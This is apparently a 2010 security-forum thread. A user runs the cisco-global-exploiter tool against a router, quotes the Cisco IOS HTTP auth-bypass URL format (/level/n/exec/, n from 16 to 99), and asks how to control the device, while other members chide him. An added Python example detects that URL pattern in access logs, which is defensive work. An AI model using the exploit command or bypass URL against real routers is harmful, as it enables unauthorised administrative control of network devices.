
Thread: Cisco IOS HTTP Auth Vulnerability

  1. #1
    Senior Member skull2006's Avatar
    Join Date
    Jan 2010
    Location
    In my skull
    Posts
    125

    Question Cisco IOS HTTP Auth Vulnerability

    Hi,

    I have a Cisco router. I tried playing with it and I found this:

    root@skull:/pentest/cisco/cisco-global-exploiter# ./cge.pl

    Usage :
    perl cge.pl <target> <vulnerability number>

    Vulnerabilities list :
    [1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
    [2] - Cisco IOS Router Denial of Service Vulnerability
    [3] - Cisco IOS HTTP Auth Vulnerability
    [4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
    [5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
    [6] - Cisco 675 Web Administration Denial of Service Vulnerability
    [7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
    [8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
    [9] - Cisco 514 UDP Flood Denial of Service Vulnerability
    [10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
    [11] - Cisco Catalyst Memory Leak Vulnerability
    [12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
    [13] - 0 Encoding IDS Bypass Vulnerability (UTF)
    [14] - Cisco IOS HTTP Denial of Service Vulnerability
    root@skull:/pentest/cisco/cisco-global-exploiter# ./cge.pl *0.2*.*4.1 3

    Vulnerability successful exploited with [http://*0.2*.*4.1/level/17/exec/....] ...

    root@skull:/pentest/cisco/cisco-global-exploiter# firefox http://*0.2*.*4.1/level/17/exec/....

    It gives me a blank page, so how can I go forward with this exploit?
    What can I do to control the router?

    best regards,

  2. #2
    Just burned his ISO ravbyte's Avatar
    Join Date
    Jul 2010
    Location
    Guatemala
    Posts
    20

    Default Re: Cisco IOS HTTP Auth Vulnerability

    My answer is a little out of thread, but I suggest you visit the nmap pen test list; there's an interesting DoS thread. Regards.

  3. #3
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default Re: Cisco IOS HTTP Auth Vulnerability

    Maybe you should check the documentation and read up on what the specific exploit does or doesn't do, which targets are vulnerable and so on.
    Tiocfaidh ár lá

  4. #4
    Senior Member skull2006's Avatar
    Join Date
    Jan 2010
    Location
    In my skull
    Posts
    125

    Default Re: Cisco IOS HTTP Auth Vulnerability

    Quote: Originally Posted by KMDave
    Maybe you should check the documentation and read up on what the specific exploit does or doesn't do, which targets are vulnerable and so on.
    This is what the documentation says:

    By sending a crafted URL it is possible to bypass authentication and execute any
    command on the router at level 15 (enable level, the most privileged level).
    This will happen only if the user is using a local database for authentication
    (usernames and passwords are defined on the device itself).
    The same URL will not be effective against every Cisco IOS software release and
    hardware combination. However, there are only 84 different combinations to try,
    so it would be easy for an attacker to test them all in a short period of time.
    The URL in question follows this format :

    http://<device_addres>/level/n/exec/....

    where n is a number between 16 and 99.

    An attacker can exercise complete control over the device.
    By exploiting this vulnerability, the attacker can see and change the
    configuration of the device.

    That is what made me ask that question.
    Last edited by skull2006; 07-19-2010 at 08:08 AM.
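
    Added example, not part of the original thread or of the tool's documentation: a detection pass over HTTP access logs that flags requests matching the URL format quoted above, and sources that try several levels in a row. The Common Log Format layout, the `scan` function name, the sweep threshold and the sample lines are assumptions made for the illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Path format quoted in the post above: /level/<n>/exec/..., n from 16 to 99.
# Case-insensitive matching is a conservative choice for detection.
LEVEL_EXEC = re.compile(r"^/level/(\d{1,3})/exec(?:/|$)", re.IGNORECASE)
# Assumed log layout: Common Log Format, e.g. from a proxy or sensor
# in front of the router's HTTP management interface.
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [19/Jul/2010:08:01:02 +0000] "GET /level/15/exec/show/version HTTP/1.0" 401 0
198.51.100.7 - - [19/Jul/2010:08:01:05 +0000] "GET /level/16/exec/ HTTP/1.0" 401 0
198.51.100.7 - - [19/Jul/2010:08:01:05 +0000] "GET /level/17/exec/ HTTP/1.0" 200 512
198.51.100.7 - - [19/Jul/2010:08:01:06 +0000] "GET /level/18/exec/ HTTP/1.0" 401 0
203.0.113.4 - - [19/Jul/2010:08:02:00 +0000] "GET /LEVEL/42/exec/show/conf HTTP/1.0" 200 2048
203.0.113.4 - - [19/Jul/2010:08:02:09 +0000] "GET /level/100/exec/ HTTP/1.0" 404 0
not a log line
"""


def scan(log_text, sweep_threshold=3):
    """Return (alerts, sweepers): requests to levels 16-99, and sources
    that requested at least sweep_threshold distinct such levels."""
    alerts, levels_by_src = [], defaultdict(set)
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m:
            continue  # unparseable line: skipped, not fatal
        src, _method, target, status = m.groups()
        # Decode percent-encoding and drop any query string before matching.
        hit = LEVEL_EXEC.match(unquote(urlsplit(target).path))
        if not hit:
            continue
        level = int(hit.group(1))
        if not 16 <= level <= 99:
            continue  # 0-15 are ordinary IOS privilege levels
        # A 2xx status means the device answered the request: escalate.
        severity = "critical" if status.startswith("2") else "attempt"
        alerts.append((src, level, int(status), severity))
        levels_by_src[src].add(level)
    sweepers = sorted(s for s, lv in levels_by_src.items()
                      if len(lv) >= sweep_threshold)
    return alerts, sweepers
```

    Calling `scan(SAMPLE_LOG)` returns the matching requests as `(source, level, status, severity)` tuples together with the list of sources that swept several levels.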

  5. #5
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default Re: Cisco IOS HTTP Auth Vulnerability

    Well, did you check all 84 combinations?
    Tiocfaidh ár lá

  6. #6
    Senior Member skull2006's Avatar
    Join Date
    Jan 2010
    Location
    In my skull
    Posts
    125

    Exclamation Re: Cisco IOS HTTP Auth Vulnerability

    Quote: Originally Posted by KMDave
    Well, did you check all 84 combinations?
    I don't know what that is ... if you could give me a good start to make my first step.

    Thank you for your feedback, man.

  7. #7
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: Cisco IOS HTTP Auth Vulnerability

    ??
    It's all explained in your post...

    Quote: Originally Posted by skull2006
    http://<device_addres>/level/n/exec/....

    where n is a number between 16 and 99. >> 84 possible combinations
    Last edited by Snayler; 07-19-2010 at 01:38 PM.

  8. #8
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: Cisco IOS HTTP Auth Vulnerability

    What can I do to control the router?
    Perhaps you should look at how it normally works... Then derive an answer for yourself after those observations?

    It gives me a blank page
    Are you running no-script or ad-block?

    Or perhaps you shouldn't be futzing with things you don't understand.
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  9. #9
    Senior Member skull2006's Avatar
    Join Date
    Jan 2010
    Location
    In my skull
    Posts
    125

    Default Re: Cisco IOS HTTP Auth Vulnerability

    Quote: Originally Posted by thorin
    Or perhaps you shouldn't be futzing with things you don't understand.
    If you have TFM send it to me or keep your word inside you.

  10. #10
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default Re: Cisco IOS HTTP Auth Vulnerability

    Quote: Originally Posted by skull2006
    If you have TFM send it to me or keep your word inside you.
    Thorin's right. You obviously don't understand what you're trying to do. And keep the bad attitude to yourself; we don't need it.
